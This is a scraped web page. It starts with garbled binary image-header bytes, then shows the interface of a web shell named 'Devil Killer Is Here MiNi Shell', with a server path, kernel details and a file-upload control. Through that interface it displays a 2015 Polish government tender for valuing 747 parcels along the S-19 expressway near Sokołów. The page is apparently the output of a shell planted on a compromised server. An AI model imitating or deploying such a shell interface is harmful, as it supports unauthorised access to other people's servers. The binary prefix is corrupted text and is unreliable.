JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150212/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150212/31802-N-2015.html

<p class="kh_header"><b>Rzeszów: Licytacja elektroniczna na usługi biegłych - rzeczoznawców majątkowych w zakresie szacowania, do celów ustalenia odszkodowania za nieruchomości położone na terenie województwa podkarpackiego, które zostaną przejęte na rzecz Skarbu Państwa na podstawie decyzji zezwalającej na realizację  inwestycji drogowej, dot. budowy drogi ekspresowej S-19 na odcinku Sokołów Młp. Płn. - Stobierna, znak sprawy OA-XVI.272.7.2015</b><br>
<b>Numer ogłoszenia: 31802 - 2015; data zamieszczenia: 12.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpacki Urząd Wojewódzki w Rzeszowie , ul. Grunwaldzka 15, 35-959 Rzeszów, woj. podkarpackie, tel. 017 867 12 08, faks 017 867 17 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzeszow.uw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Licytacja elektroniczna na usługi biegłych - rzeczoznawców majątkowych w zakresie szacowania, do celów ustalenia odszkodowania za nieruchomości położone na terenie województwa podkarpackiego, które zostaną przejęte na rzecz Skarbu Państwa na podstawie decyzji zezwalającej na realizację  inwestycji drogowej, dot. budowy drogi ekspresowej S-19 na odcinku Sokołów Młp. Płn. - Stobierna, znak sprawy OA-XVI.272.7.2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie operatów szacunkowych określających wartość 747 działek oraz występowanie w charakterze biegłego w toku prowadzonych 
w trybie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania 
i realizacji inwestycji w zakresie dróg publicznych (j.t. Dz. U. z 2013 r., poz. 687 z późn. zm.), postępowań administracyjnych mających na celu ustalenie wysokości odszkodowań za nieruchomości, które zostaną przejęte na rzecz Skarbu Państwa, 
na podstawie nw. decyzji o zezwoleniu na realizację inwestycji drogowej pn.:

Wycena 747 działek (w tym 26 działek zabudowanych - działki podkreślone w Załączniku nr 1 do umowy).
Budowa I etapu drogi ekspresowej S-19 na odcinku: węzeł Sokołów Małopolski Północ (bez węzła) - Stobierna od km 449+096,52 do km 461+593,03 wraz z włączeniem (odcinek klasy G) do istniejącej drogi krajowej nr 19 od km 448+090,549 do km 449+096,52 oraz niezbędną infrastrukturą techniczną, budowlami i urządzeniami budowlanymi

Obręb Sokołów:
2706, 2707, 2709, 2710, 2711, 2712, 2713, 2714, 2716, 2717, 2718, 3529/2, 3530/4, 3532/2, 3533/2, 3534/3, 3534/4, 3543, 3544, 3545, 3546, 3547, 3550, 3551, 3552, 3553, 3554/1, 3554/2, 3555, 3556, 3557, 3558, 3559, 3568, 3569, 3570, 3855, 3856, 3857, 3858, 3918, 3919, 3920/1, 3920/2, 3921, 3922, 3923, 3924, 3925, 3926, 3927, 3993, 3994/1, 3994/2, 3995, 3996, 3997, 3998, 3999, 4000, 4001, 4508, 4509/1, 4509/2, 4510, 4511, 4512, 4513, 4514, 4515, 4516, 4517, 4610, 4611, 4616, 4617, 4618, 4619, 4620, 4629, 4630, 4634/1, 4263/1, 4264/1, 4265/1, 4266/3, 4266/5, 4267/5, 4267/3, 4268/1, 4269/1, 5328/1, 5329/4, 5329/6, 6112/1, 5325/6, 5325/7, 5326/1, 5326/2, 5327/1, 5312/1, 5313/1, 5322/1, 5324/3, 5324/4, 5302/1, 5303/1, 5308/1, 5309/1, 5309/2, 5311/1, 5298/1, 5299/1, 5275/1, 5297/1, 5273/1, 5274/1, 5268/1, 5269/1, 5270/1, 5271/1, 4649/1, 5260/22, 5265/1, 5266/1, 4641/2, 4642/1, 4643/1, 4648/1, 4636/1, 4637/1, 4638/1, 4639/1, 4640/1, 4631/1, 4631/2, 4632/1, 4633/3, 4633/5, 4634/3, 4635/1, 4625/1, 4626/1, 4627/1, 4627/2, 4628/2, 4628/3, 4615/1, 4621/1, 4622/1, 4623/1, 4623/2, 4624/1, 4624/2, 4606/2, 4612/1, 4613/5, 4613/3, 4614/1, 4507/1, 4518/1, 4561/3, 4561/6, 4605/2, 4503/1, 4504/1, 4505/1, 4506/1, 4279/1, 4280/1, 4281/1, 4282/1, 4293/1, 4274/3, 4275/1, 4276/3, 4277/1, 4278/1, 4270/1, 4271/1, 4272/1, 4273/1, 3992/1, 4002/1, 4003/3, 4003/5, 4049/1, 3854/1, 3928/1, 3929/3, 3929/5, 3975/1, 3991/1, 3564/1, 3566/1, 3567/1, 3571/1, 3705/1, 3706/1, 3548/1, 3549/1, 3560/1, 3561/1, 3539/1, 3540/1, 3542/3, 3548/1, 3534/7, 3537/1, 3538/1, 3532/4, 3533/3, 3534/5, 3528/1, 3530/5, 3530/7, 3531/3, 3035/1, 3144/1, 3525/3, 3025/1, 3026/1, 3029/1, 3030/1, 3031/1, 3032/1, 3033/1, 3034/1, 3019/1, 3020/1, 3021/1, 3022/1, 3024/1, 3016/1, 3018/1, 3012/1, 3013/1, 3014/1, 3005/1, 3006/1, 3007/1, 3008/1, 3009/1, 3010/1, 3011/1, 3004/1, 3000/1, 3001/1, 3002/1, 3003/1, 2998/1, 2998/2, 2999/1, 2999/2, 2993/1, 2993/2, 2994/1, 2994/2, 2995/1, 2995/2, 2990/1, 2990/2, 2991/1, 2991/2, 2992/1, 2992/2, 2986/1, 2986/2, 2987/1, 2987/2, 2989/1, 2989/2, 2982/1, 2983/1, 2984/1, 2985/1, 2985/2, 2621/1, 2810/3, 2980/1, 2586/1, 2587/1, 2589/1, 2590/1, 2582/1, 2584/1, 2585/1, 2575/1, 2576/1, 2577/1, 2578/1, 2579/1, 2580/1, 2572/1, 2566/1, 2567/1, 2568/1, 2569/1, 2570/1, 2571/1, 2562/1, 2563/1, 2564/1, 2565/1, 2559/3, 2559/6, 2560/1, 2561/1, 2554/1, 2558/1, 2549/1, 2550/1, 2551/1, 2552/1, 2553/1, 2157/22, 2157/24, 2271/6, 2289/1, 2497/3, 2157/48, 2157/20, 2157/18, 2157/28, 2157/39, 2157/42, 2157/45, 2150/1, 2151/1, 2152/1, 2153/1, 2154/3, 2155/1, 2157/26, 2157/30, 2157/33, 2157/34, 2157/37.
Obręb Stobierna:
2464, 2465, 2478, 2479, 2480, 2481, 2482, 2483, 2484, 2521, 2545, 2546, 2636, 2659/2, 2685, 2789/1, 2790/1, 2791/1, 2792/1, 2797/2, 2838/2, 2939/1, 2969/2, 1515/1, 1516/1, 1527/1, 1614/2, 1782/1, 1795/1, 2004/1, 2388/1, 2389/3, 2389/5, 2390/1, 2391/1, 2392/1, 2393/1, 2395/1, 2396/1, 2397/1, 2412/1, 2429/1, 2430/1, 2431/1, 2432/1, 2433/1, 2434/1, 2435/1, 2438/1, 2439/10, 2439/12, 2442/1, 2463/1, 2466/1, 2467/1, 2470/1, 2473/1, 2474/1, 2475/1, 2476/1, 2477/1, 2485/1, 2486/1, 2514/1, 2519/1, 2520/1, 2522/1, 2523/1, 2525/1, 2526/1, 2527/1, 2531/1, 2532/1, 2533/1, 2534/3, 2535/1, 2536/1, 2537/1, 2538/1, 2540/1, 2541/1, 2542/1, 2543/1, 2544/1, 2547/1, 2548/3, 2549/1, 2627/1, 2628/1, 2629/1, 2630/1, 2631/1, 2633/1, 2634/1, 2635/1, 2637/1, 2638/1, 2640/3, 2641/3, 2641/5, 2643/1, 2644/1, 2645/1, 2651/3, 2659/3, 2660/3, 2660/4, 2661/3, 2662/3, 2663/3, 2664/1, 2665/1, 2666/1, 2667/1, 2668/1, 2669/1, 2682/3, 2684/3, 2686/1, 2760/3, 2789/4, 2790/4, 2798/1, 2822/4, 2836/1, 2837/3, 2847/4, 2852/3, 2865/7, 2865/8, 2865/5, 2866/3, 2870/3, 2871/1, 2937/3.
Obręb Wólka Sokołowska:
498/1, 499/1, 500/1, 500/2, 501/1, 501/2, 502/1, 502/2, 503/1, 504/1, 505/3, 506/1, 507/1, 508/1, 509/1, 514/1, 515/1, 516/1, 517/1, 523/1.
Obręb Trzebuska:
1426/1, 1427/1, 1428/1, 1429/1, 1430/1, 1431/1, 1432/1, 1433/1, 1441/1, 1480/1, 1481/1, 1482/1, 1483/1, 1484/1, 1484/2, 1485/1, 1486/1, 1487/1, 1488/1, 1489/1, 1490/1, 1491/1, 1492/1, 1531/1, 1548/3, 1562/1, 1563/1, 1564/1, 1565/1, 1566/1, 1567/1, 1568/1, 1569/1, 1570/1, 1572/1, 1573/1, 1574/1, 1575/1, 1576/1, 1577/1, 1578/1, 1579/1, 1580/1, 1610/1, 1611/1, 1612/1, 1613/1, 1614/1, 1615/1, 1616/1, 1617/1, 1618/1, 1619/3, 1619/5, 1620/1, 1621/1, 1623/1, 1625/1, 1626/1, 1627/1, 1628/1, 1629/1, 1630/1, 1631/1, 1632/1, 1633/1, 1634/1, 1636/3.
Obręb Pogwizdów:
1/2, 2, 4, 5/1, 5/2, 6, 7, 9, 1/3, 1/4, 8/1
Obręb Nienadówka:
265/1, 265/2, 266/1, 266/3, 266/4, 267/1, 267/2, 330, 1596, 1619/2, 1620, 1621, 1622, 1623, 1624, 1625, 1626, 1627/1, 1628, 1629, 1630, 1631, 1632/2, 1634, 1636, 1700, 1725/1, 1727/2, 1727/5, 1727/6, 1727/4, 1728, 1748/5, 1748/6, 1752/5, 1752/16, 1756, 1763, 1764/3, 1766, 1768/2, 1771/1, 253/5, 253/8, 255/1, 256/1, 257/1, 257/2, 258/1, 258/2, 258/3, 259/1, 260/1, 260/2, 261/1, 262/1, 262/2, 263/3, 263/4, 263/5, 263/10, 264/1, 269/1, 270/1, 271/1, 282/2, 283/2, 284/2, 286/1, 287/2, 288/1, 289/4, 291/1, 292/2, 294/1, 295/1, 297/1, 298/1, 300/1, 303/1, 307/1, 309/1, 311/1, 312/1, 314/1, 316/1, 318/1, 320/1, 322/1, 324/1, 325/1, 326/1, 326/2, 331/1, 333/1, 337/1, 338/1, 339/1, 340/1, 487/1, 814/1, 815/22, 817/64, 817/62, 1591/1, 1595/1, 1598/1, 1600/9, 1600/7, 1600/5, 1619/3, 1632/3, 1633/1, 1635/1, 1635/2, 1637/1, 1637/2, 1638/1, 1638/2, 1639/1, 1639/2, 1641/1, 1642/1, 1643/3, 1645/3, 1647/1, 1651/1, 1655/1, 1657/1, 1659/1, 1663/1, 1667/1, 1669/1, 1670/1, 1681/1, 1683/1, 1685/1, 1687/1, 1689/1, 1690/1, 1697/1, 1701/1, 1709/1, 1710/1, 1721/1, 1723/1, 1725/3, 1729/3, 1733/1, 1735/3, 1736/1, 1740/1, 1742/1, 1744/9, 1744/11, 1744/13, 1745/1, 1747/4, 1748/10, 1748/8, 1752/17, 1757/12, 1764/4, 1765/1, 1767/6, 1769/6, 1771/8, 1774/6, 1778/1, 2748/3, 3200/3, 3200/5, 3201/1, 3202/1, 3392/1.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.31.90.00-7.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający pozytywnie oceni spełnienie przez Wykonawcę tego warunku, jeżeli Wykonawca dołączy do składanego wniosku o dopuszczenie do licytacji elektronicznej podpisane oświadczenie - załącznik nr 1 do wniosku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Zamawiający pozytywnie oceni spełnienie przez Wykonawcę tego warunku, jeżeli Wykonawca dołączy do składanego wniosku o dopuszczenie do licytacji elektronicznej wykaz usług/operatów (w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia), wykonanych w okresie ostatnich trzech lat, przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dokonał wyceny przynajmniej: w ramach 2 umów, każda na min. 200 działek, związanych z wykonaniem operatów szacunkowych na potrzeby ustalenia odszkodowań za nieruchomości przeznaczone pod inwestycje drogowe z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - zał. nr 5 do wniosku wg wzoru.
Do wykazu muszą zostać dołączone dokumenty potwierdzające, iż wskazane usługi/operaty zostały wykonane lub są wykonywane należycie (zał. nr 5.1, 5.2, 5.3 itd.).
Dowodami mogą być poświadczenia, z tym, że w odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, albo oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
W przypadku, gdy Zamawiający jest podmiotem na rzecz, którego usługi wskazane 
w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania poświadczeń, o których mowa powyżej.
b)Dodatkowo Zamawiający, w celu zweryfikowania rzetelności Wykonawcy, żąda wskazania w wykazie - zał. nr 5 do wniosku wg wzoru - informacji o usługach niewykonanych lub wykonanych nienależycie - za rzetelnego Wykonawcę składającego ofertę/wniosek o dopuszczenie do udziału w postępowaniu zostanie uznany ten, który w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, nie wykonał lub wykonał nienależycie (w szczególności z przyczyn zależnych od Wykonawcy została rozwiązana umowa, sądownie została przyznana kara umowna lub odszkodowanie z ww. tytułu)  maksymalnie jednej usługi związanej z wykonaniem operatów szacunkowych - w ramach umowy przekraczającej wartość 126 747,00 zł netto. Przy czym niewykonanie lub nienależyte wykonanie zamówienia nie może być związane z zawinionym poważnym naruszeniem obowiązków zawodowych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający pozytywnie oceni spełnienie przez Wykonawcę tego warunku, jeżeli Wykonawca dołączy do składanego wniosku o dopuszczenie do licytacji elektronicznej podpisane oświadczenie - załącznik nr 1 do wniosku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający pozytywnie oceni spełnienie przez Wykonawcę tego warunku, jeżeli Wykonawca dołączy do składanego wniosku o dopuszczenie do licytacji elektronicznej podpisane oświadczenie - załącznik nr 1 do wniosku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający pozytywnie oceni spełnienie przez Wykonawcę tego warunku, jeżeli Wykonawca dołączy do składanego wniosku o dopuszczenie do licytacji elektronicznej podpisane oświadczenie - załącznik nr 1 do wniosku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Jak w III.3.2);</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawcy występujący wspólnie zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. Do wniosku o dopuszczenie do udziału w postępowaniu Część B należy dołączyć oryginał pełnomocnictwa lub kopię pełnomocnictwa potwierdzoną przez Wykonawcę za zgodność z oryginałem (zał. nr 6 do wniosku). W treści udzielonego pełnomocnictwa muszą się znaleźć następujące wskazania pełnomocnictwo dotyczy niniejszego postępowania o udzielenie zamówienia, nazwa z określeniem adresu i siedziby wszystkich Wykonawców ubiegających się wspólnie o udzielenie niniejszego zamówienia, ustanowiony pełnomocnik oraz zakres jego umocowania. Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia.
Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców składających wspólną ofertę/wniosek o dopuszczenie do udziału w postępowaniu. Stosowne odpisy z rejestru lub ewidencji należy dołączyć do wniosku o dopuszczenie do udziału w postępowaniu Część B (zał. nr 6.1, 6.2, 6.3 itd.). Powyższych zasad powinien przestrzegać także Wykonawca, który udzielił pełnomocnictwa celem jego reprezentowania w niniejszym postępowaniu. 
2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych
podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (zał. nr 7 do wniosku)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w przypadku: 
1.W razie niemożności wykonania w terminie zlecenia z przyczyn niezależnych od Wykonawcy termin wykonania zlecenia może być przedłużony na wniosek Wykonawcy, który w sposób wiarygodny udokumentuje fakt zaistniałej przeszkody. Nowy termin wykonania ustala się aneksem do zlecenia.
2.W przypadku zmiany stawki VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl/</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> bip.rzeszow.uw.gov.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wymagania formalne: a) Z platformy w pełnym zakresie mogą korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod adresem https://licytacje.uzp.gov.pl/ b) Wykonawca, aby umożliwić Zamawiającemu dopuszczenie go do udziału w licytacji, winien zarejestrować się w systemie dostępnym na stronie https://licytacje.uzp.gov.pl/, a wraz z wnioskiem o dopuszczenie go do udziału
w licytacji winien przekazać Zamawiającemu informację o swoim loginie. 2. Wymagania techniczne: Komputer klasy PC z zainstalowanym systemem operacyjnym Windows/Linux spełniający wymogi techniczne określone przez producentów przeglądarek internetowych Internet Explorer w wersji 6.0 lub 7.0 albo Mozilla Firefox w wersji 2.0 lub 3.0, z zainstalowaną jedną z ww. przeglądarek lub przeglądarką równoważną, podłączony do sieci Internet. Zamawiający zaleca zapoznanie się z regulaminem korzystania z platformy licytacyjnej umieszczonym na stronie https://licytacje.uzp.gov.pl/.</p>
